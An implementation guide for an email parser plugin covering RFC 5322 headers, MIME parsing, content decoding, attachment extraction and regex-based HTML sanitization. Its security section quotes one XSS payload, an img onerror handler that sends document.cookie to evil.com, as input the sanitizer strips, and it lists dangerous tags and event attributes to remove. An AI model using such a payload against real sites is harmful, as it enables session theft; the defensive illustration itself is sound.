Email Parser Plugin - Implementation Guide
Phase 6 of the email client architecture: RFC 5322 compliant email parsing with comprehensive MIME support.
Architecture Overview
The email parser is a workflow node executor that transforms raw RFC 5322 email messages into structured data compatible with the DBAL EmailMessage and EmailAttachment entities.
Flow
Raw IMAP Message (RFC 5322)
    ↓
[Email Parser Plugin]
  ├─ Parse Headers (RFC 5322)
  ├─ Parse MIME Structure (RFC 2045-2049)
  ├─ Extract Bodies (text/plain, text/html)
  ├─ Extract Attachments
  └─ Sanitize HTML (XSS Protection)
    ↓
Structured EmailMessage
  ├─ messageId, from, to, cc, bcc, replyTo
  ├─ subject, textBody, htmlBody
  ├─ headers (all key-value pairs)
  └─ attachments[] with metadata
    ↓
[DBAL Write Node]
  ├─ Store EmailMessage entity
  └─ Store EmailAttachment entities (one per file)
Implementation Details
1. Header Parsing (RFC 5322)
The parser implements RFC 5322 header field syntax:
header-field = field-name ":" field-body
field-name = 1*ftext
field-body = field-value [CRLF WSP field-value] ; header folding
Key Features:
- Case-insensitive header names
- Support for folding (continuation lines)
- Multiple values for same header (e.g., Received, X-Custom)
- RFC 2047 encoded-word decoding for non-ASCII
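As an illustration of the RFC 2047 feature, here is a minimal sketch of encoded-word decoding. The function name decodeEncodedWords is hypothetical and not taken from the plugin, and the sketch assumes only UTF-8 and US-ASCII charsets; other charsets are left untouched.

```typescript
import { Buffer } from "node:buffer";

// Hypothetical helper: decodes "=?charset?B|Q?text?=" tokens in a header value.
// Assumption: only UTF-8 / US-ASCII are handled; other charsets pass through unchanged.
function decodeEncodedWords(value: string): string {
  // Whitespace between two adjacent encoded-words is not part of the text.
  const joined = value.replace(/(\?=)\s+(=\?)/g, "$1$2");

  return joined.replace(
    /=\?([^?]+)\?([bBqQ])\?([^?]*)\?=/g,
    (whole: string, charset: string, enc: string, text: string): string => {
      if (!/^(utf-8|us-ascii)$/i.test(charset)) return whole;

      if (enc.toUpperCase() === "B") {
        return Buffer.from(text, "base64").toString("utf8");
      }

      // Q encoding: "_" means space, "=XX" is one byte in hex.
      const bytes: number[] = [];
      for (let i = 0; i < text.length; i++) {
        const hex = text.slice(i + 1, i + 3);
        if (text[i] === "=" && /^[0-9A-Fa-f]{2}$/.test(hex)) {
          bytes.push(parseInt(hex, 16));
          i += 2;
        } else {
          bytes.push(text[i] === "_" ? 0x20 : text.charCodeAt(i));
        }
      }
      return Buffer.from(bytes).toString("utf8");
    }
  );
}
```

Bytes are collected before converting to a string so that multi-byte UTF-8 sequences such as =C3=A9 decode to a single character.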
Implementation:
private _parseHeaders(headersSection: string): Map<string, string | string[]>
Process:
- Split by CRLF or LF
- Check each line for continuation (starts with space/tab)
- Store in case-insensitive Map
- Handle duplicate headers as arrays
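The process above can be sketched roughly as follows. This is a simplified stand-in for _parseHeaders, not the plugin's actual code: the standalone function name parseHeaders is an assumption, and folded lines are joined with a single space.

```typescript
type HeaderMap = Map<string, string | string[]>;

// Hypothetical standalone version of the header parsing steps.
function parseHeaders(headersSection: string): HeaderMap {
  const headers: HeaderMap = new Map();
  const unfolded: string[] = [];

  // Split on CRLF or bare LF, then append continuation lines to the previous line.
  for (const line of headersSection.split(/\r?\n/)) {
    if (/^[ \t]/.test(line) && unfolded.length > 0) {
      unfolded[unfolded.length - 1] += " " + line.trim();
    } else if (line.length > 0) {
      unfolded.push(line);
    }
  }

  for (const line of unfolded) {
    const colon = line.indexOf(":");
    if (colon <= 0) continue; // not a header field, skip it

    const name = line.slice(0, colon).trim().toLowerCase(); // case-insensitive key
    const value = line.slice(colon + 1).trim();
    const existing = headers.get(name);

    if (existing === undefined) {
      headers.set(name, value);
    } else if (Array.isArray(existing)) {
      existing.push(value);
    } else {
      headers.set(name, [existing, value]); // duplicate header becomes an array
    }
  }
  return headers;
}
```

Lower-casing the key is one simple way to get case-insensitive lookups from a plain Map; callers then always query with lower-case names such as "subject" or "received".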
2. MIME Structure Parsing (RFC 2045-2049)
Multipart messages have recursive structure:
multipart/alternative
├─ text/plain (simple part)
├─ text/html (simple part)
└─ multipart/mixed
   ├─ text/plain
   └─ application/pdf (attachment)
Key Features:
- Detect multipart messages via Content-Type: multipart/*
- Extract boundary from Content-Type parameter
- Split body by boundary delimiters (--boundary)
- Parse each part recursively
- Support nested multipart structures
Implementation:
private _parseMimePart(
  body: string,
  contentType: string,
  contentEncoding: string
): MimePart
Process:
- Check if message is multipart
- Extract boundary from Content-Type
- Split body by boundary
- For each part, recursively call _parseMimePart
- Build tree structure
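A minimal sketch of these steps is shown below. The MimePartSketch type and the helper names getBoundary, splitMultipart and parseMimePart are assumptions made for illustration; the real MimePart type and the contentEncoding handling are not reproduced here.

```typescript
// Hypothetical tree node; the plugin's real MimePart may carry more fields.
interface MimePartSketch {
  contentType: string;
  body: string;            // raw, still-encoded body
  parts: MimePartSketch[]; // children of multipart/* nodes
}

function getBoundary(contentType: string): string | undefined {
  const m = /boundary\s*=\s*(?:"([^"]+)"|([^\s;]+))/i.exec(contentType);
  return m ? (m[1] ?? m[2]) : undefined;
}

// Splits on whole delimiter lines ("--boundary"), stopping at "--boundary--".
function splitMultipart(body: string, boundary: string): string[] {
  const open = "--" + boundary;
  const close = open + "--";
  const parts: string[] = [];
  let current: string[] | null = null; // null while inside the preamble

  for (const line of body.split(/\r?\n/)) {
    const trimmed = line.trimEnd();
    if (trimmed === close) {
      if (current) parts.push(current.join("\r\n"));
      current = null;
      break; // everything after the closing delimiter is epilogue
    }
    if (trimmed === open) {
      if (current) parts.push(current.join("\r\n"));
      current = [];
    } else if (current) {
      current.push(line);
    }
  }
  if (current) parts.push(current.join("\r\n")); // tolerate a missing closing delimiter
  return parts;
}

function parseMimePart(body: string, contentType: string): MimePartSketch {
  const node: MimePartSketch = { contentType, body, parts: [] };
  if (!/^\s*multipart\//i.test(contentType)) return node; // leaf part

  const boundary = getBoundary(contentType);
  if (!boundary) return node; // malformed multipart, treated as a leaf

  for (const raw of splitMultipart(body, boundary)) {
    const lines = raw.split(/\r?\n/);
    const blank = lines.indexOf(""); // part headers end at the first empty line
    const headerLines = blank === -1 ? lines : lines.slice(0, blank);
    const partBody = blank === -1 ? "" : lines.slice(blank + 1).join("\r\n");

    const headerText = headerLines.join("\n").replace(/\n[ \t]+/g, " "); // unfold
    const m = /^content-type:[ \t]*(.*)$/im.exec(headerText);
    const partType = m ? m[1].trim() : "text/plain"; // RFC 2045 default type

    node.parts.push(parseMimePart(partBody, partType)); // recurse into nested parts
  }
  return node;
}
```

Matching whole delimiter lines rather than calling split on the boundary string avoids mis-splitting when a nested boundary happens to start with the outer boundary's text.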
3. Body Extraction
Extract text and HTML bodies from MIME tree:
Strategy for multipart/alternative:
- Prefer text/html if available
- Fall back to text/plain if HTML not present
- Skip both if neither found
Strategy for multipart/mixed:
- First text/plain → textBody
- First text/html → htmlBody
- Other parts → attachments
Implementation:
private _extractBodies(
  mimePart: MimePart,
  sanitizeHtml: boolean,
  maxLength: number
): { textBody?: string; htmlBody?: string; sanitizationWarnings: number }
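The "first text/plain, first text/html" rule can be sketched as a depth-first walk over the MIME tree. The BodyPart type and the extractBodies function below are hypothetical simplifications: content is assumed to be already decoded, and both the multipart/alternative preference and HTML sanitization are left out.

```typescript
// Hypothetical, simplified MIME node with already-decoded content.
interface BodyPart {
  contentType: string; // e.g. "text/html; charset=utf-8"
  content: string;
  parts: BodyPart[];
}

function extractBodies(
  root: BodyPart,
  maxLength: number
): { textBody?: string; htmlBody?: string } {
  const result: { textBody?: string; htmlBody?: string } = {};

  const visit = (part: BodyPart): void => {
    // Compare only the media type, ignoring parameters such as charset.
    const type = (part.contentType.split(";")[0] ?? "").trim().toLowerCase();

    if (type.startsWith("multipart/")) {
      part.parts.forEach(visit); // descend in document order
    } else if (type === "text/plain" && result.textBody === undefined) {
      result.textBody = part.content.slice(0, maxLength);
    } else if (type === "text/html" && result.htmlBody === undefined) {
      result.htmlBody = part.content.slice(0, maxLength);
    }
    // Any other leaf would be handled by attachment extraction.
  };

  visit(root);
  return result;
}
```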
4. Content Encoding
Handle multiple content transfer encodings:
| Encoding | Handling |
|---|---|
| base64 | Decode using Buffer.from() |
| quoted-printable | Decode soft line breaks (=\r\n) and escape sequences (=XX) |
| 7bit, 8bit, binary | No transformation needed |
Implementation:
private _decodeContent(content: string, encoding: string): string
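A minimal sketch of the decoding rules in the table follows. It is a standalone approximation of _decodeContent, and it assumes the decoded bytes are UTF-8 text; a real implementation would need to honour the part's charset parameter.

```typescript
import { Buffer } from "node:buffer";

// Hypothetical standalone decoder. Assumption: decoded bytes are UTF-8 text.
function decodeContent(content: string, encoding: string): string {
  switch (encoding.trim().toLowerCase()) {
    case "base64":
      // Strip the line breaks that wrap base64 bodies before decoding.
      return Buffer.from(content.replace(/\s+/g, ""), "base64").toString("utf8");

    case "quoted-printable": {
      const src = content.replace(/=\r?\n/g, ""); // remove soft line breaks
      const bytes: number[] = [];
      for (let i = 0; i < src.length; i++) {
        const hex = src.slice(i + 1, i + 3);
        if (src[i] === "=" && /^[0-9A-Fa-f]{2}$/.test(hex)) {
          bytes.push(parseInt(hex, 16)); // =XX escape sequence
          i += 2;
        } else {
          bytes.push(src.charCodeAt(i) & 0xff); // literal character
        }
      }
      return Buffer.from(bytes).toString("utf8");
    }

    default:
      return content; // 7bit, 8bit, binary: no transformation
  }
}
```

For example, decodeContent("SGVsbG8=", "base64") returns "Hello".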
5. HTML Sanitization
Remove XSS vectors while preserving content:
Dangerous Tags Removed:
- Script execution: <script>, <style>
- Embedding: <iframe>, <object>, <embed>, <applet>
- Forms: <form>, <input>, <button>, <select>
- SVG/Math: <svg>, <math>
Dangerous Attributes Removed:
- Event handlers: onclick, onerror, onload, onchange, etc.
- URLs with javascript: href="javascript:...", src="javascript:..."
- Scripts in forms: formaction, action
Implementation:
private _sanitizeHtml(html: string): { html: string; warnings: number }
Process:
- Remove script tags and content: <script>.*?</script>
- Remove iframe tags: <iframe>.*?</iframe>
- Remove style tags: <style>.*?</style>
- Strip event handlers from all tags
- Remove event handler attributes globally
Safety Notes:
- Does NOT parse HTML into DOM (text-based replacement)
- Does NOT load external resources
- Does NOT validate tag nesting
- Conservative: Removes suspicious content
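The text-based approach described above might look roughly like this. The patterns are illustrative assumptions rather than the plugin's actual rules, and, as with any regex-based sanitizer, they should not be treated as a complete defence against malformed or obfuscated markup.

```typescript
// Hypothetical regex-based sanitizer sketch; counts every removal as a warning.
function sanitizeHtml(html: string): { html: string; warnings: number } {
  let warnings = 0;
  const strip = (input: string, pattern: RegExp): string =>
    input.replace(pattern, () => {
      warnings++;
      return "";
    });

  let out = html;

  // 1. Remove paired dangerous elements together with their content.
  for (const tag of ["script", "style", "iframe", "object", "applet", "svg", "math"]) {
    out = strip(out, new RegExp(`<${tag}\\b[^>]*>[\\s\\S]*?</${tag}\\s*>`, "gi"));
  }

  // 2. Remove any leftover opening, closing, or void tags from the dangerous list.
  out = strip(
    out,
    /<\/?(?:script|style|iframe|object|embed|applet|form|input|button|select|svg|math)\b[^>]*>/gi
  );

  // 3. Remove event handler attributes (onclick, onerror, ...).
  out = strip(out, /\s+on[a-z]+\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi);

  // 4. Remove formaction / action attributes.
  out = strip(out, /\s+(?:formaction|action)\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi);

  // 5. Remove href/src attributes that carry a javascript: URL.
  out = strip(
    out,
    /\s+(?:href|src)\s*=\s*(?:"\s*javascript:[^"]*"|'\s*javascript:[^']*'|javascript:[^\s>]+)/gi
  );

  return { html: out, warnings };
}
```

The attribute patterns are deliberately broad, so they can also remove look-alike text outside of tags; that matches the conservative stance in the safety notes.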
6. Attachment Extraction
Identify and catalog attachments:
Criteria for Attachment:
- MIME part exists in multipart/mixed
- Not in list of inline types (text/plain, text/html)
- Has Content-Disposition header
- Filename can be extracted from filename parameter
Metadata Collected:
- filename: From Content-Disposition or Content-Type name parameter
- mimeType: Extracted from Content-Type
- size: Length of encoded content
- contentId: For embedded resources (Content-ID header)
- isInline: From Content-Disposition inline vs attachment
- contentEncoding: Transfer encoding used
- content: Optional base64 when extractSize < 10MB
Implementation:
private _extractAttachments(
  mimePart: MimePart,
  extractContent: boolean,
  maxSize: number
): { attachments: EmailAttachmentMetadata[]; ... }
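As an illustration of how the filename and isInline fields might be derived, here is a small sketch. The helpers getParam and describeAttachment are hypothetical names, and RFC 2231 extended parameters (filename*=) are not handled.

```typescript
// Hypothetical helper: reads a ";name=value" parameter from a header value.
function getParam(headerValue: string, name: string): string | undefined {
  const pattern = new RegExp(`;\\s*${name}\\s*=\\s*(?:"([^"]*)"|([^\\s;]+))`, "i");
  const m = pattern.exec(headerValue);
  return m ? (m[1] ?? m[2]) : undefined;
}

// Hypothetical subset of the attachment metadata described above.
function describeAttachment(
  contentDisposition: string | undefined,
  contentType: string
): { filename: string | undefined; isInline: boolean } {
  const disposition = ((contentDisposition ?? "").split(";")[0] ?? "").trim().toLowerCase();

  // Prefer the Content-Disposition filename, then fall back to the Content-Type name.
  const filename =
    (contentDisposition && getParam(contentDisposition, "filename")) ||
    getParam(contentType, "name");

  return { filename, isInline: disposition === "inline" };
}
```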
Testing Strategy
Unit Tests
- RFC 5322 Parsing
  - Simple headers
  - Multiple To addresses
  - Display names in addresses
  - Header folding with continuation lines
  - Optional headers (CC, BCC, Reply-To)
- MIME Multipart
  - multipart/alternative (text + html)
  - multipart/mixed (body + attachments)
  - Nested multipart structures
  - Boundary handling edge cases
- Content Encoding
  - Base64 decoding
  - Quoted-printable decoding
  - 7bit, 8bit, binary pass-through
- HTML Sanitization
  - Script tag removal
  - Event handler removal
  - iframe removal
  - Safe HTML preservation
- Attachment Extraction
  - Attachment cataloging
  - Inline vs attachment detection
  - Size limit enforcement
  - Content extraction control
- Error Handling
  - Missing From header
  - Missing To header
  - Invalid MIME structure
  - Parsing recovery
- Real-World Scenarios
  - Complete realistic emails
  - Multiple attachments
  - Complex nesting
  - Unicode headers (RFC 2047)
Coverage Goals
- Line coverage: 80%+
- Branch coverage: 80%+
- All error paths tested
- Edge cases (empty headers, no body, etc.)
Integration Points
With IMAP Sync Plugin
IMAP Sync fetches raw message from IMAP server:
// IMAP returns raw RFC 5322 message
const rawMessage = await imapClient.fetchMessage(messageId, 'BODY[]');

// Parser receives it
const config: EmailParserConfig = {
  rawMessage, // ← Raw RFC 5322 format
  tenantId: user.tenantId
};
With DBAL Storage
Parser output matches DBAL entity schema:
// Parser output
const message: ParsedEmailMessage = {
  messageId: "<123@example.com>",
  from: "alice@example.com",
  to: ["bob@example.com"],
  subject: "Meeting",
  textBody: "Let's meet at 2pm",
  htmlBody: "<p>Let's meet at 2pm</p>",
  attachments: [
    { filename: "agenda.pdf", mimeType: "application/pdf", ... }
  ]
};

// DBAL entity
const emailMessage: EmailMessage = {
  tenantId: user.tenantId,
  emailClientId: account.id,
  folderId: folder.id,
  messageId: message.messageId,
  from: message.from,
  to: JSON.stringify(message.to), // JSON stored in DB
  subject: message.subject,
  textBody: message.textBody,
  htmlBody: message.htmlBody,
  headers: JSON.stringify(message.headers),
  receivedAt: new Date(message.receivedAt).getTime(),
  attachmentCount: message.attachments.length
};

// Attachments stored separately
for (const attachment of message.attachments) {
  const emailAttachment: EmailAttachment = {
    tenantId: user.tenantId,
    messageId: emailMessage.id,
    filename: attachment.filename,
    mimeType: attachment.mimeType,
    size: attachment.size,
    contentId: attachment.contentId,
    isInline: attachment.isInline,
    storageKey: `attachments/${emailMessage.id}/${attachment.filename}`,
    downloadUrl: generatePresignedUrl(...)
  };
}
Performance Considerations
Memory
- Loads entire message into memory
- Large messages (>100MB) may exhaust available memory
- Attachment content not extracted by default (metadata only)
- For large attachments: Set extractAttachmentContent: false
Parsing Speed
Typical times:
- Simple text: <1ms
- Text + HTML: 2-5ms
- With attachment: 5-10ms
- Large HTML (5MB): 50-100ms
Optimization
- Disable HTML sanitization if not needed (rare):
  sanitizeHtml: false // Faster, but less safe
- Don't extract large attachment content:
  extractAttachmentContent: false // Metadata only
- Limit body length:
  maxBodyLength: 1024 * 1024 // 1MB cap
- Set reasonable attachment limits:
  maxAttachmentSize: 25 * 1024 * 1024 // Skip > 25MB
Security Considerations
XSS Prevention
The parser sanitizes all HTML to prevent stored XSS:
// Input (dangerous)
<img src="x" onerror="fetch('http://evil.com/steal?data=' + document.cookie)">
// Output (safe)
<img src="x"> // onerror removed
No Code Execution
The parser:
- Does NOT execute JavaScript
- Does NOT make HTTP requests
- Does NOT access filesystem
- Does NOT run arbitrary code
Multi-Tenant Safety
All parser operations include tenantId:
- Used in workflow context
- Passed to DBAL storage
- Enforces row-level access control
No External Dependencies
The parser uses only Node.js built-in APIs:
- Buffer for encoding/decoding
- Regular expressions for parsing
- No external npm packages
Error Recovery
Graceful Degradation
When non-critical errors occur:
{
  status: 'partial',
  message: ParsedEmailMessage, // ← Still produced
  errors: [ // ← Non-fatal errors listed
    { code: 'INVALID_MIME', message: '...', recoverable: true }
  ]
}
Recoverable vs Non-Recoverable
Non-Recoverable (no message output):
- Missing From header
- Missing To header
- Total parse exception
Recoverable (message still output):
- Malformed MIME structure
- Invalid encoding in attachment
- Header parsing issues
- HTML sanitization warnings
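One way to express this split in code is to derive the result status from the collected errors. In the sketch below, only the 'partial' status and the error object shape come from this guide; the 'success' and 'error' status values and the resolveStatus helper are assumptions.

```typescript
// Error shape as shown in the graceful degradation example.
interface ParseError {
  code: string;
  message: string;
  recoverable: boolean;
}

// Assumption: 'success' and 'error' are hypothetical status names.
type ParseStatus = "success" | "partial" | "error";

function resolveStatus(errors: ParseError[]): ParseStatus {
  // Any non-recoverable error means no message is produced.
  if (errors.some((e) => !e.recoverable)) return "error";
  // Recoverable errors still yield a message, flagged as partial.
  return errors.length > 0 ? "partial" : "success";
}
```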
Future Enhancements
- Streaming Support
  - Process large messages in chunks
  - Reduce memory footprint
- Async Content Extraction
  - Store attachments to S3 during parsing
  - Return only metadata
- S/MIME and PGP
  - Decrypt encrypted content
  - Verify signatures
  - Extract certificates
- Better Charset Handling
  - Detect charset from content
  - Handle more encodings
- Header Validation
  - DKIM signature verification
  - SPF/DMARC checking
- Conversation Threading
  - Group related messages
  - Extract references (In-Reply-To, References)
Debugging
Enable Detailed Logging
In workflow execution context:
const result = await emailParserExecutor.execute(node, context, state);
// Check metrics
console.log('Parse time:', result.output.metrics.parseDurationMs);
console.log('Headers:', result.output.metrics.headerCount);
console.log('Parts:', result.output.metrics.partCount);
console.log('Attachments:', result.output.metrics.attachmentCount);
// Check warnings
if (result.output.warnings.length > 0) {
  console.warn('Warnings:', result.output.warnings);
}
// Check errors
if (result.output.errors.length > 0) {
  console.error('Errors:', result.output.errors);
}
Common Issues
- Empty body after parsing
  - Check if message has body at all
  - Verify Content-Type multipart handling
  - Check character encoding
- Attachments not found
  - Verify multipart/mixed structure
  - Check Content-Disposition header
  - Verify maxAttachmentSize limit
- HTML missing after sanitization
  - Check if HTML was actually present
  - Review sanitization warnings count
  - The sanitizer may have removed all content if every element was flagged as dangerous
- Special characters garbled
  - Check RFC 2047 encoding in header
  - Verify charset parameter in Content-Type
  - Check the Buffer encoding used during base64 decode
Contributing
To extend the parser:
- Add new MIME type support in _extractBodies()
- Add new sanitization rules in _sanitizeHtml()
- Add encoding support in _decodeContent()
- Add tests in index.test.ts
- Update README.md with new features
References
- RFC 5322 - Internet Message Format
- RFC 2045-2049 - MIME (Multipurpose Internet Mail Extensions)
- RFC 2047 - MIME Header Extensions for Non-ASCII Text
- RFC 3501 - IMAP4rev1 (Mailbox Integration)
- RFC 2183 - Content-Disposition Header Field
- RFC 2387 - The MIME Multipart/Related Content-Type